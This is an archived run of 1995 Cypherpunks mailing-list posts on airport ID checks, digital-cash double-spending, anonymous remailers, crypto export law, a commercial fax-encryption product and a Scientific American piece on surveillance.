> a driver's license. Maybe you could say you'll be at a convention in a hotel
> for several days, and won't be leaving except walking or by taxi.)  Get them
> to explain very precisely just what gives them the legal authority to
> refuse you entry to the plane. (I'd be interested in hearing the answer
> myself !)  I expect this will work better if they're checking IDs at the
> gates, rather than the general X-ray/security post, so that you're dealing
> with plastic-smiled airline personnel.

I removed all picture identification from my wallet (my CA driver's license)
and packed away my U.S. passport (though I was not leaving the U.S.) deep
inside my luggage (just in case.)

I actually took a Taxi to the airport and was not planning on driving
at any time over the course of my trip.  I could actually truthfully
make these claims, which was useful as I'm not a very good liar.

Unfortunately, I arrived at the airport much later than I had intended.
I checked my bags at curbside, where I was asked for identification.  Not
wanting to miss my flight, I merely looked and acted miffed and dug my
passport out of my baggage.  I then put my passport back into my baggage,
which was then checked.

I hurried to the gate, where I discovered that the flight was delayed by
a good hour.  Damn.  If I had known that, I wouldn't have checked my bags
at the curb.  Oh well.

However, I hadn't been given a boarding pass and still needed to check in
at the gate for that.  Delta wanted I.D. again.  At this point, I was
actually not carrying any picture identification.

The plastic, smiling Delta employee behind the counter at the gate was
not happy, mostly because she looked to be having an otherwise rough day
and obviously didn't want to deal with anything out of the ordinary.

I told her that I had only a U.S. passport, and that it was in my already
checked baggage.  I was hoping the problem would be escalated to management,
where I could start asking about their legal authority for denying me
boarding privileges, but she (probably without authority) essentially said
"to hell with it" and gave me my boarding pass, adding a comment that
the rank-and-file Delta employees thought that the ID requirement was a
bad idea anyway.

There was no verification that I was telling the truth about having checked
my baggage (though I was) so that I could have actually gotten on the plane
without showing my identification.

I've flown twice since then (on SouthWest), without being asked for any
identification.

Dana W. Albrecht
dwa@corsair.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 09:37:30 PDT
To: cypherpunks@toad.com
Subject: Re: SciAm Bye-Byes Privacy
Message-ID: <199510191637.MAA28223@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>Scientific American, November, 1995
>
>Rights of Privacy
>
>Technology has its eyes on you
>
>But the search for personalization in a high-tech world
>may create an uncomfortable situation in the global
>village. Villages are safe places but not very private
>ones. Mrs. Grundy, peering from behind her lace curtains,
>did stop housebreakers. but she also tried to halt many
>other things of which she disapproved. There are signs
>that Grundyism is returning to Britain. 

For those who have neglected their education:

1798

Theater --- "Speed the Plough" by English playwright Thomas Morton, 34. "Be
quiet, wull ye [says farmer Ashfield]. Always ding, dinging Dame Grundy into
my ears-What will Mrs. Grundy say? What will Mrs. Grundy think?" 

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: privsoft@ix.netcom.com (Steve )
Date: Thu, 19 Oct 95 12:54:35 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: responce to graphic encryption replies
Message-ID: <199510191953.MAA29605@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain

find attached the document on PrivaSoft in txt format. Once again if 
you have any comments please call or E-mail me.
Steve Orrin
Mgr. Tech Services

*************************************************
PrivaSoft TM                                    *
1877 Springfield Ave PO BOX 600                 *
Maplewood NJ 07040-0600                        *
Tel. 201-378-8865  Fax. 201-762-3742            *
Http://www.privasoft.com/privasoft              *
E-mail: privsoft@ix.netcom.com                  *
*************************************************




How Secure Can PrivaSoft Be?
Introduction
PrivaSoft is a communication security product, and the user is entitled to know how secure it is.  This document addresses the question of cryptographic strength of PrivaSoft.
Export license regulations
In some advanced countries, cryptographic products are categorized as "munitions" and their use, sale or exportation is controlled by local licensing regulations.  PrivaSoft has obtained an export license from the governments of Israel and the USA.  Licen
ses in other countries are obtained in coordination with the local distributors.  The typical policy is to limit the allowable cryptographic strength of commercial products to a level that is strong enough for commercial purposes.  The basic intention of 
this regulation is to protect the state from abuse of too strong cryptographic products by terrorists and criminals.  Some countries do not practice such law because it is viewed as a denial of freedom of expression.  PrivaSoft willfully complies with the
se regulations as it is a commercial product, and it is not intended for national security applications with its current key length which is the maximum legally allowable for commercial users.
The cryptographic engine of PrivaSoft
PrivaSoft uses a pseudo-random generator that is seeded by a 9 digit number uniformly normalized from the user's secret key.  The engine is proprietary, designed according to the rules of modern cryptology to make the best use of the allowable key length.
  Like other dependable cryptographic engines, the structure of the encryption software can be disclosed without compromising the security of the user.  However, the coding and specific parameters of the mechanism are considered a trade secret and will be
 disclosed for the purpose of cryptoanalytic validation when necessary and under an appropriate non-disclosure non-competition agreement.
The use of default keys
When secret keys or passwords are used by laymen, there is always a conflict between security and convenience:  The user tends to use fixed, easily memorized keys again and again, while the cryptoanalyst only waits for an opportunity to see many messages 
encrypted by the same key.  PrivaSoft, being a secure commercial product must live in peace with both - allow the user to use a repetitive, default key, and deny the cryptoanalyst the pleasure of having many messages encrypted by one key.  This is done by
 using the pseudo-random "key extension" feature which is described in the PrivaSoft user's guide.
The information contents a clear message
If a cryptographic product is properly designed, then the almost only way to crack it is to try all possible keys.  If the process is done by a computer, the "cracking"" software must be taught to tell the correct key from the wrong keys.  This can only b
e done if there are some properties of the decrypted message that are known a - priori.  With the PrivaSoft analogue graphical encryption, and with the naturally noisy fax images, a significant portion of the page must be reconstructed, and a significant 
amount of mathematical correlation must be calculated between neighboring areas of the image, before the cracking software can tell whether the candidate key is wrong.  This makes the cracking process much slower than in alphanumeric encryption of the tex
t in a natural language.  The 9 digit key, when applied to analogue, the graphical encryption is equivalent to a much longer key applied to alphanumeric encryption.  The cryptographically oriented user can make it very much harder by some smart pre-proces
sing of the image prior to its encryption.  A simple example:  For a short message, increasing the font size of the text by a factor of 10 will significantly increase the time required for breaking the encryption.
Customized versions of PrivaSoft
PrivaSoft is unique in being a one-stop product than can serve all types of modern correspondence, including E-mail, fax and paper printouts.  Special applications that need and can obtain a license to use non-commercial cryptographic engines can be accom
modated by special versions of PrivaSoft.  The cryptographic engine can be customer-furnished and customer integrated, however - since in some areas the integration of this product with certain cryptographic engines may be considered "munitions", each cus
tomized version of the product has to be licensed separately in accordance with the laws of the territory where it was created and used.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Thu, 19 Oct 95 10:00:06 PDT
To: kelso <kelso@netcom.com>
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510182035.NAA28382@netcom22.netcom.com>
Message-ID: <Pine.SUN.3.91.951019125552.25823A-100000@celsius.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, kelso wrote:

> One method to take the heat off of the last remailer
> in a chain would be to call on our friend the "one
> time pad".  A message is split into two equal parts
> that only make sense when the two parts are 'xor'ed
> together. 

Hmmm...this leads to the "unobnoxious anonymous remailer" concept.  I am 
under the impression that most cases of people getting upset about anon 
remailers is when they get threatening email from them.  

One could require that all email going through a remailer must be 
encrypted (perhaps with a universally known key).  That way when Joe 
clueless users gets encrypted mail he doesn't expect, he probably is too 
clueless to go find the key and decrypt it...

This would require the remailer to examine entropy of messages passing 
through.  Anything not random enough gets tossed.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Thu, 19 Oct 95 10:02:29 PDT
To: John Gilmore <gnu@toad.com>
Subject: Re: REMINDER: SF Federal Building, Oct 20, 1015AM: Bernstein case
In-Reply-To: <9510190245.AA20897@toad.com>
Message-ID: <Pine.SUN.3.91.951019130143.25823B-100000@celsius.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, John Gilmore wrote:

> Last reminder!  Come to the Federal Building in SF this Friday at
> 10:15AM, go upstairs to Judge Marilyn Hall Patel's courtroom, and Be
> There for the first skirmish in the trial of crypto export controls.
> 450 Golden Gate Avenue in downtown SF, two blocks from Van Ness.

Q:  Will they allow CU-SeeMe in the courtroom?  (over Metricom radio modem?)

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 19 Oct 95 10:21:18 PDT
To: aleph1@dfw.net (Aleph One)
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <Pine.SUN.3.90.951019115251.17527B-100000@dfw.net>
Message-ID: <9510191718.AA19952@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> I belive you have been told *SAVERAL* times you *WONT* get an answer
> on this list, and to contact their PR department. Why dont you do us all 
> a favor. Contact the PR department if this questions really burns you so 
> much. Get an answer. And post it on the list.

So the PR department defines security at Netscape?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Thu, 19 Oct 95 13:20:57 PDT
To: cypherpunks@toad.com (cypherpunks)
Subject: Re: digital cash and identity disclosure
In-Reply-To: <acabe4df3f021004b9f5@[205.199.118.202]>
Message-ID: <9510192017.AA26270@doom>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote:

> "Double spending" detection is a REAL MESS. That's my basic conclusion. It
> tends to require schemes for going after double spenders, it tends to make
> identity-revealing attacks possible (such as the attack I alluded to, and
> that Hal more completely describes), and it's INELEGANT.
> 
> "Immediate clearing" is much more elegant, and is, I think, truer to the
> spirit of "annonymous digital cash" than most of these other schemes are.
> (Grep the FAQ for "online" or "online clearing" or "clearing" and you
> should find some stuff. Also, several articles--including one recently by
> me, about a month ago--go into the differences between the types of
> clearing.)

I also suggest taking a look at Stefan Brands' solution, which, while
requiring hardware, has some favorable properties.  Among these are:

   - prior restraint of double spending through hardware-based
   "secret-key certificates"

   - in the case of hardware tampering, double spenders are traceable
   as in Chaum's system; however, the protocol used to achieve this is
   much more efficient than Chaum's "cut-and-choose"

   - no possibility of a subliminal channel between the
   tamper-resistant device and the payee or bank


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Thu, 19 Oct 95 11:18:40 PDT
To: fc@all.net
Subject: [NOISE], period
Message-ID: <9510191730.AA28775@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain


|   From owner-cypherpunks@toad.com Wed Oct 18 20:55:59 1995
|   Subject: Re: 50 attacks... [NOISE]
|   X-Mailer: ELM [version 2.4 PL22]
|   Sender: owner-cypherpunks@toad.com
|   X-Status: 
|
|   Dr. Cohen wrote:
|
|   Boy, you people just don't appreciate anything that has a little bit of
|   humor mixed with a little bit of reality. 

It's that 'little bit of reality' that concerns me.

|   2 - I can't believe that you all think that aplets (a.k.a.  downloadable
|   programs at the push of a button) will make you safe.  The "we will only
|   run trusted applets and they will all be secure" attitude is 180 degrees
|   off base from my view.

I think it is a misstatement to say that any of us believe that applets
will "make us safe". I believe that applets, combined with the ability to
configure your local browser such that it scans all incoming programs for 
security exceptions, combined with the ability to completely remove those 
classes which allow risky things to occur, combined with the opportunity
to utilize these technologies within trusted channels (i.e., internal nets)
in order to reduce load on our web servers, etc. is an enormous breakthrough.
As such, we are taking our time to review the manner in which the classes
are structured, the VM is structured, and the security mechanisms are enabled.

This appears to be something which you refuse to do.

|   3 - I would have figured at least one of you would have looked up the
|   chosen plaintext attack and told me why Netscape keys can't be gotten
|   at this way.  I think there's an off change I could win a grand!

Here you reveal more about the poverty of your motives than you could
possibly imagine.

|   4 - If you just keep quiet, I may be able to get $50K out of Netscape
|   for a few minutes of typing.  If they can make a billion on hype, why
|   can't I make $50K?

Because you haven't done your homework.

|   8 - The first 50 flamers responding to this message get a free 1 Gigabyte
|   email message every day for the next week.  Anonymous remailers included.

Oh, I hope I'm still one of the first 50 (I doubt it). I'd love to see the
expression on the face of whoever runs your system. 

"You sent a 1Gb mail message through our mailer?!?"

Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo@imonics.com
Imonics Web Services                    webmaster@imonics.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Date: Thu, 19 Oct 95 11:43:55 PDT
To: aleph1@dfw.net (Aleph One)
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <9510191718.AA19952@all.net>
Message-ID: <9510191339.ZM19844@pamd.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


== Dr. Frederick B. Cohen once spoke...
== So the PR department defines security at Netscape?

perhaps not.  however, i would bet that the PR dept. at Netscape could
answer your questions.  have you even *attempted* to contact Netscape
directly?  or are your questions merely rhetorical ramblings?

regards,
--robert
--

o  robert owen thomas: unix consultant. cymro ydw i. user scratching post.  o
o       e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com        o
o               vox:  708.435.7076   fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 19 Oct 95 06:45:18 PDT
To: John Gilmore <gnu@toad.com>
Subject: Re: REMINDER: SF Federal Building, Oct 20, 1015AM: Bernstein case
In-Reply-To: <9510190245.AA20897@toad.com>
Message-ID: <Pine.BSD.3.91.951019133453.8166A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


FREE ADVICE WHICH IS IS WORTH JUST WHAT YOU PAID FOR IT:

    john's comment to "dess like a banker" is VERY APPROPRIATE.  Many
bankers have bards and long hair (as long as they do not interface with
front line customers).  The issue is the THE "suit" --and the neatly
combed long beard and preferably ponytailed hair. 
    when I controlled big bucks, I couod get through the door of any 
swiss banker in Tshirt and jeans --now I wear my "funeral" suit!
    don't "intimidate" the judge with a crowd of anti-social rowdies 
(yes, us), and show respect for the judge --the demeanor of both the 
protagonists and the "court" influences the judge, and a win at this 
level makes sustaining the judgement through appeals significantly less 
expensive.

On Wed, 18 Oct 1995, John Gilmore wrote:

> Last reminder!  Come to the Federal Building in SF this Friday at
> 10:15AM, go upstairs to Judge Marilyn Hall Patel's courtroom, and Be
> There for the first skirmish in the trial of crypto export controls.
> 450 Golden Gate Avenue in downtown SF, two blocks from Van Ness.
> 
> We've gotten a lot of press interest.  Both the legal-newspapers in
> SF, the Examiner, and many others will be covering it.  Some of them
> breathlessly asked, "Will the cypherpunks hold a demonstration?", but
> what we will demonstrate is how the legal system can turn against the
> bureaucrats and authoritarians who currently hold crypto hostage.
> 
> This will be a low-key meeting, quietly bearing witness, at least
> before we adjourn to a probably rowdy lunch at Max's Opera Cafe at Van
> Ness and Golden Gate Avenues.  If you can't come to the hearing, at
> least come for lunch!
> 
> And don't forget, it's a costume party: Dress like a banker.  Even
> you bitbankers.  Even me.  See you there!
> 
> 	John
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Thu, 19 Oct 95 12:49:07 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: digital cash and identity disclosure
In-Reply-To: <acabe4df3f021004b9f5@[205.199.118.202]>
Message-ID: <199510191948.NAA24841@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Someone claiming to be the nym calling itself tcmay@got.net (Timothy C. 
May) wrote:
>
> As Hal notes, there are a lot of issues and attacks to consider. I'm sorry
> that my brief section on Chaumian digital cash in the Cyphernomicon doesn't
> adequately cover the issues (and as the debates here show, confusion still
> reigns, and no doubt some of my points are misleading, wrong, or
> incomplete).


Boy, if I were you I would want to fix the inadequacy in C'nomicon in
order to protect my positive rep...


> "Double spending" detection is a REAL MESS. That's my basic conclusion. It
> tends to require schemes for going after double spenders,


You mean Real Life(tm) security a.k.a. force, but this isn't 
necessarily so.  We could just as well debit the double-spender's 
rep and lower the limit on how much e-cash he will be issued.


> it tends to make
> identity-revealing attacks possible (such as the attack I alluded to, and
> that Hal more completely describes),


I hesitate to pipe up in such august company, but one of us is
confused.  The attack that we have been discussing is possible because
Chaumian Ecash allows the payer to identify the payee.  This would be
true whether or not there were any protocols related to
double-spending.  (i.e., because the payer knows the actual ID number
of the bill, she can choose to relate it to the bank and then the bank
can identify who turns in that bill.  Has nothing to do with
double-spending.  If the protocol provided for re-blinding before
depositing the bill then this would not be possible, I think, and 
would still have nothing to do with double-spending.)


> and it's INELEGANT.


I personally think it is beautiful, because it allows for off-line
transactions at a cost of a relatively small risk of double-spending.
Perhaps we could modify the protocol and have the best of both worlds?
I think I'll write a separate post on this subject now...


Regards,

Bryce

Announcement: I'm about to fade out from c'punks list for a while, so
be sure and Cc: me if you want me to see your post.

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIarbfWZSllhfG25AQEYzAQAtjBPJ6iZAepKa4sfzFjciX9oPK/orYcl
GT7WpBPJSmPeuBEUdruNDcp3GEuuBit+xOsAqvaORA3epw12BDlzlBN3gU4nq5dL
GmsDR7CKX64Ouz/+qxoMmGPUe/CH6FHg4msIvitE7A6DNltYJMPOfWrVF3lhwcx7
iguZ8TAbtTU=
=fXcK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Thu, 19 Oct 95 13:01:33 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Polymorphic e-cash schemes  was: digital cash and identity disclosure
In-Reply-To: <acabe4df3f021004b9f5@[205.199.118.202]>
Message-ID: <199510192001.OAA25866@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Some cpunks a couple of months ago told us about "agnostic" e-cash
anonymity schemes in which the e-bank accepts both blinded and
un-blinded coin requests, leading to anonymity or non-anonymity at the
choice of the client.  They pointed out how this would be very
easy to implement, based on the current Chaumian system.  I think this
is an excellent idea for social-engineering reasons and I congratulate
them on bringing it up.  (Unfortunately I don't have time right now 
to look up who it is that I am congratulating...)


Perhaps a similar "polymorphism" could be implemented with regard to
on-line/off-line clearing.  When you as a payee receive a Chaumian
Ecash coin, you can choose based on several factors (including
reputation of the payer if he chooses to make his nym known to you,
size of the transaction, time of day, or whatever) to either accept it
immediately and credit the payer with whatever it is you are selling,
or to delay completion of the transaction while you attempt to deposit
the coin with your e-bank.  (If you are wary of "payee-ID proof
stings" like Lucky Green is, then you can go ahead and launder your
coin through an anon account during this interval...)  If your payer
has already spent this coin, then the bank will inform you immediately
and you can cancel the transaction.  (And take whatever other actions
you consider appropriate...)


It seems like such a scheme would include all of the advantages
(off-line clearing) of Chaumian Ecash as well as those
(double-spending prevention) of the on-line clearing systems.  Thus,
TCMay's objections to current Chaumian Ecash would not apply to this
new variation.


I hope that this isn't an old-news yawner to you experts.


Regards,

Bryce

Announcement:  I'm going to be fading off the the c'punks list for a
while, so be sure and Cc: me if you want me to read your post.

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIauO/WZSllhfG25AQGXHwP+MEpnPvpj81fV66HEb8rozlMepnol3nj5
/d73LQpMxB7fLcMEDmISNQef/eU39zId8EZ1XCW7X3AujMBa4OjuBgl3+vdrAKo9
DIb6imXxc+E9dyHp0i9y/FZtzkOXKF6Abwy3SYMOSyaI2HsiCyUx2tEW/6OzDJTi
7YyOqR+FkNQ=
=cpK7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Oct 95 13:49:53 PDT
To: Bryce <wilcoxb@nag.cs.colorado.edu>
Subject: Re: digital cash and identity disclosure
Message-ID: <acac05c4410210047467@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:48 PM 10/19/95, Bryce wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
> Someone claiming to be the nym calling itself tcmay@got.net (Timothy C.
>May) wrote:
>>
>> As Hal notes, there are a lot of issues and attacks to consider. I'm sorry
>> that my brief section on Chaumian digital cash in the Cyphernomicon doesn't
>> adequately cover the issues (and as the debates here show, confusion still
>> reigns, and no doubt some of my points are misleading, wrong, or
>> incomplete).
>
>
>Boy, if I were you I would want to fix the inadequacy in C'nomicon in
>order to protect my positive rep...

To each their own. There's not enough time in my life to fix all the things
that are wrong, even if I knew what they all were.

My "positive rep," such as it is with certain people, does not depend on
producing flawless documents.

In fact, there are different kinds of people. Some favor "closely reasoned"
arguments (A implies B implies C implies D....), some favor "imaginative
leaps." Where I am depends on my mood.

-
>> it tends to make
>> identity-revealing attacks possible (such as the attack I alluded to, and
>> that Hal more completely describes),
>
>
>I hesitate to pipe up in such august company, but one of us is
>confused.  The attack that we have been discussing is possible because
>Chaumian Ecash allows the payer to identify the payee.  This would be
>true whether or not there were any protocols related to
>double-spending.  (i.e., because the payer knows the actual ID number
>of the bill, she can choose to relate it to the bank and then the bank
>can identify who turns in that bill.  Has nothing to do with
>double-spending.  If the protocol provided for re-blinding before
>depositing the bill then this would not be possible, I think, and
>would still have nothing to do with double-spending.)

Oh, but it does. Suppose Alice pays out the same piece of digital cash to
Bob, Charles, Ellen, Dave, etc. Each thinks they've been paid, each gets to
the bank, each finds the bank will not honor the digital cash, as Alice has
double spent.

(Note: Any schemes for "re-blinding" must still allow "uniqueness"...and
must still point back to Alice. Else the scheme/scam above will work.
Online clearing, in which only the _first_ to present a digital cash claim
gets paid, does not have this problem.)


>Announcement: I'm about to fade out from c'punks list for a while, so
>be sure and Cc: me if you want me to see your post.

I will this time, but people generally should not expect out-of-band cc:ings.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbaber@mi.leeds.ac.uk
Date: Thu, 19 Oct 95 06:10:34 PDT
To: cypherpunks@toad.com
Subject: Re:  crypto export from the UK
Message-ID: <4843.9510191407@misun2.mi.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



sameer <sameer@c2.org> wrote:
> 	Could people in the UK please tell me what the crypto export
> laws are like there? I know someone who wrote some really great crypto
> code in the UK but isn't willing to distribute it because of crypto
> export laws... I was under the impression that it was legal to export
> crypto from the UK.

I believe that the laws regarding the export of crypto from the UK are
very similar to the ITAR regs in the US. However our Government seems
to take the view that putting crypto software on the net is not
exporting it, the exporting is done whenever anyone from an export
restricted country downloads the software and is done by them rather
than by the person who made the software available.

Strong crypto is therefore openly available from a number of places in
this country, particually sable.ox.ac.uk at the university of Oxford.

Of course IANAL and the government may change it's mind about the
interpretation of these things but I would expect that your
acquaintance would be perfectly safe distributing his software via
sable (the ftp site (and its predicessor) have been distributing
crypto software for a number of years and I have not heard of any
problems).

Jon C. Baber
jbaber@mi.leeds.ac.uk
http://www.chem.surrey.ac.uk:80/~ch02jb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 11:14:46 PDT
To: cypherpunks@toad.com
Subject: Re: Oh to be a mouse in the corner...
Message-ID: <199510191813.OAA13657@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>PR   10/17 1720  ABA: TERRORISM EXPERTS TO SPEAK
>
>including former CIA Director William Colby, former FBI Director William
>Sessions, and Oklahoma Governor Frank Keating, whose state was the site of the
>worst domestic terrorist attack in U.S. history.

I thought the Civil War was the worst?

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 11:14:53 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: This PROMISes to be odius
Message-ID: <199510191813.OAA13667@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:20 PM 10/18/95 -0400, Brad Dolan wrote:
>
>PR   10/18 0809  ORACLE INTRODUCES SOFTWARE TOOL FOR LAW ENFORCEMENT 
>
>Tool Helps Federal, State, Municipal Agencies Stop the Criminal Element
>
>     Oracle SIUSS represents a major step forward in the collection, storage
>and analysis of case intelligence information for complex conspiracies, violent
>crimes such as rape and murder, drug trafficking, and other major cases.
>

I asked a friend of mine at Oracle if they are going to sell this to all
comers.  It would certainly be useful for tracking the activities of
government agents.

I'll see what he says.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 11:14:09 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: airport security
Message-ID: <199510191813.OAA13676@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:25 AM 10/19/95 -0400, Futplex wrote:

>It's bad enough that it is "illegal" (at least according to some recent ARC 
>flight coupons of mine) to sell or otherwise transfer your tickets to someone
>else. I'd love to see them try to justify crap like that.

Find a friendly travel agent.  Roll the ticket stock out of the printer
before your ticket is printed.  Cross out and initial the offending terms.
Pay for the ticket and have it printed.

We call it negotiation.

DCF

"But my name *is* Dr. Fred C. Schwartz.  I changed it just before I got
these tickets from Dr. Fred C. Schwartz.  I asked him to get them for me.  I
may change my name back to Duncan Frissell after the flight."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 11:14:26 PDT
To: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Subject: Re: airport security
Message-ID: <199510191813.OAA13695@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:16 AM 10/19/95 -0400, Bob Bruen, MIT Lab for Nuclear Science wrote:

>   Without actually agreeing with the FAA, the reason you can't have a name
>   other than your own on your ticket, as well as why you are required to
>   be in your assigned seat on take-off and landing is because if there is 
>   a plane crash, they need to be able to identify an otherwise difficult
>   to identify body. This does have some relevance to airport security if
>   a plane is blown up.

So, since planes were much more likely to crash in 1957 then they are now,
I suppose that you *really* must have had to prove your identity to get on a
plane in those days.

DCF

"Who wonders who's going to blow away the Gremlins eating the engines of
*today's* planes since the passengers have been disarmed."  Too much Outer
Limits/Twilight Zone/Science Fiction Theater as a kid.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 19 Oct 95 06:35:39 PDT
To: cypherpunks@toad.com
Subject: SciAm Bye-Byes Privacy
Message-ID: <199510191329.OAA09581@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Scientific American, November, 1995

Rights of Privacy

Technology has its eyes on you


Privacy, as George Orwell pointed out, rests on some
level on a bargain between people and their machines.
Long before 1984, communications technology had the
potential to become surveillance technology. Now it is.
Not, as Orwell might have predicted, because Big Brother
wants to keep his subjects in thrall but simply because
most people want it to be. By giving up some protective
anonymity, people get safety and service. A majority seem
to think the bargain a very good one -- which is why
everybody should look very carefully at the fine print.

Somewhat ironically for the nation that gave birth to
Orwell, Britain is leading the way in creating the kind
of society that he taught the world to fear. More than
300 British city streets are wired for 24-hour
surveillance by closed-circuit television cameras. From
control rooms, police and private security officers scan
everything that moves, or doesn't, and dispatch police
officers to investigate anything suspicious.

More cities are getting wired all the time, often by
popular demand. Whatever qualms Britons have about
privacy, they are more concerned about crime. The cameras
do seem to reduce crime -- at least in the areas
underneath the cameras. Academics point out that
surveillance seems to have no impact whatsoever on the
overall level of crime, which is rising, but people just
don't seem to care about where the muggers go when they
leave their neighborhood -- particularly when their
neighborhood wasn't too good to begin with.

Safety is not the only reason to embrace surveillance. At
the Olivetti Research Laboratory in Cambridge, for
instance, Andy Hopper and his staff have for years worn
tiny badges that inform their computers where they are
each minute. The point is convenience. Computers
automatically bring to the screen the work of the person
sitting in front of them. Calls are forwarded to the
telephone nearest wherever they happen to be -- unless
the computers detect three or more badge wearers gathered
in the same office, in which case they are assumed to be
in a meeting, and calls are forwarded to their voice
mail.

To make life more convenient still, Hopper is trying even
cleverer technologies. Some chairs now contain compasses
that monitor whether they are pointed at a screen, and,
if not, the screen is dimmed to save power. Such devices,
Hopper reckons, are crucial to making computers
effortlessly easy to use. As he puts it, "You can't have
personalization without identification."

But the search for personalization in a high-tech world
may create an uncomfortable situation in the global
village. Villages are safe places but not very private
ones. Mrs. Grundy, peering from behind her lace curtains,
did stop housebreakers. but she also tried to halt many
other things of which she disapproved. There are signs
that Grundyism is returning to Britain. Many of the
crimes recorded by surveillance cameras are worryingly
petty. Arrests for urinating in public have soared. For
better and for worse, cameras that can see in the dark
now line romantic walks to the beaches in seaside towns.

In Britain, as elsewhere, technology and politicians are
about to deepen the privacy dilemma. Cameras are being
linked to smarter computers that can identify people.
Some drivers receive tickets without human intervention.
Video cameras check their speed and read their license
plates. Along with a ticket, the owner is sent a
photograph of the car and driver at the time the speeding
was clocked. A number of companies are touting technology
